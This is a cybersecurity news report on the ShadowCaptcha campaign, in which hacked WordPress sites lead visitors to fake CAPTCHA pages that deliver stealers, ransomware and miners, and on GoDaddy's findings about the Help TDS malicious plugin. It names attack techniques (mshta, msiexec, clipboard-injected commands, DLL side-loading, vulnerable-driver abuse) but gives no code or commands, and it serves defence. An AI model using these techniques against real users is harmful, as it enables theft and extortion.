A new large-scale campaign has been observed exploiting over 100 compromised WordPress sites to direct site visitors to fake CAPTCHA verification pages that employ the ClickFix social engineering tactic to deliver information stealers, ransomware, and cryptocurrency miners.
The large-scale cybercrime campaign, first detected in August 2025, has been codenamed ShadowCaptcha by the Israel National Digital Agency.
“The campaign […] blends social engineering, living-off-the-land binaries (LOLBins), and multi-stage payload delivery to gain and maintain a foothold in targeted systems,” researchers Shimi Cohen, Adi Pick, Idan Beit Yosef, Hila David, and Yaniv Goldman said.
“The ultimate objectives of ShadowCaptcha are collecting sensitive information through credential harvesting and browser data exfiltration, deploying cryptocurrency miners to generate illicit profits, and even causing ransomware outbreaks.”
The attacks begin with unsuspecting users visiting a compromised WordPress website that has been injected with malicious JavaScript code that’s responsible for initiating a redirection chain that takes them to a fake Cloudflare or Google CAPTCHA page.
From there, the attack chain forks into two, depending on the ClickFix instructions displayed on the web page: One that utilizes the Windows Run dialog and another that guides the victim to save a page as an HTML Application (HTA) and then run it using mshta.exe.
The execution flow triggered via the Windows Run dialog culminates in the deployment of Lumma and Rhadamanthys stealers via MSI installers launched using msiexec.exe or through remotely-hosted HTA files run using mshta.exe, whereas the execution of the saved HTA payload results in the installation of Epsilon Red ransomware.
It’s worth pointing out that the use of ClickFix lures to trick users into downloading malicious HTA files for spreading Epsilon Red ransomware was documented last month by CloudSEK.
“The compromised ClickFix page automatically executes obfuscated JavaScript that uses ‘navigator.clipboard.writeText’ to copy a malicious command to the user’s clipboard without any interaction, relying on users to paste and run it unknowingly,” the researchers said.
The attacks are characterized by the use of anti-debugger techniques to prevent inspection of web pages using browser developer tools, while also relying on DLL side-loading to execute malicious code under the guise of legitimate processes.
Select ShadowCaptcha campaigns have observed delivering an XMRig-based cryptocurrency miner, with some variants fetching the mining configuration from a Pastebin URL rather than hard-coding it in the malware, thus allowing them to adjust the parameters on the fly.
In cases where the miner payloads are deployed, the attackers have also been observed dropping a vulnerable driver (“WinRing0x64.sys”) to achieve kernel-level access and interact with CPU registers with an aim to improve mining efficiency.
Of the infected WordPress sites, a majority of them are located in Australia, Brazil, Italy, Canada, Colombia, and Israel, spanning technology, hospitality, legal/finance, healthcare, and real estate sectors.
To mitigate the risks posed by ShadowCaptcha, it’s essential to train users to watch out for ClickFix campaigns, segment networks to prevent lateral movement, and ensure WordPress sites are kept up-to-date and secured using multi-factor authentication (MFA) protections.
“ShadowCaptcha shows how social-engineering attacks have evolved into full-spectrum cyber operations,” the researchers said. “By tricking users into running built-in Windows tools and layering obfuscated scripts and vulnerable drivers, operators gain stealthy persistence and can pivot between data theft, crypto mining, or ransomware.”
The disclosure comes as GoDaddy detailed the evolution of Help TDS, a traffic distribution (or direction) system that has been active since 2017 and has been linked to malicious schemes like VexTrio Viper. Help TDS provides partners and affiliates with PHP code templates that are injected into WordPress sites, ultimately directing users to malicious destinations based on the targeting criteria.
“The operation specializes in tech support scams utilizing full-screen browser manipulation and exit prevention techniques to trap victims on fraudulent Microsoft Windows security alert pages, with fallback monetization through dating, cryptocurrency, and sweepstakes scams,” security researcher Denis Sinegubko said.
Some of the notable malware campaigns that have leveraged Help TDS in recent years include DollyWay, Balada Injector, and DNS TXT redirects. The scam pages, for their part, use JavaScript to force browsers to enter full-screen mode and display the fraudulent alert and even feature counterfeit CAPTCHA challenges before rendering them in a bid to sidestep automated security scanners.
Help TDS operators are said to have developed a malicious WordPress plugin known as “woocommerce_inputs” between late 2024 and August 2025 to enable the redirection functionality, alongside steadily adding credential harvesting, geographic filtering, and advanced evasion techniques. The plugin is estimated to be installed on over 10,000 sites worldwide.
The malicious plugin masquerades as WooCommerce to evade detection by site owners. It’s exclusively installed by attackers after compromising WordPress sites through stolen administrator credentials.
“This plugin serves as both a traffic monetization tool and credential harvesting mechanism, demonstrating continuous evolution from simple redirect functionality to a sophisticated malware-as-a-service offering,” GoDaddy said.
“By providing ready-made solutions including C2 infrastructure, standardized PHP injection templates, and fully-featured malicious WordPress plugins, Help TDS has lowered the barrier to entry for cybercriminals seeking to monetize infiltrated websites.”
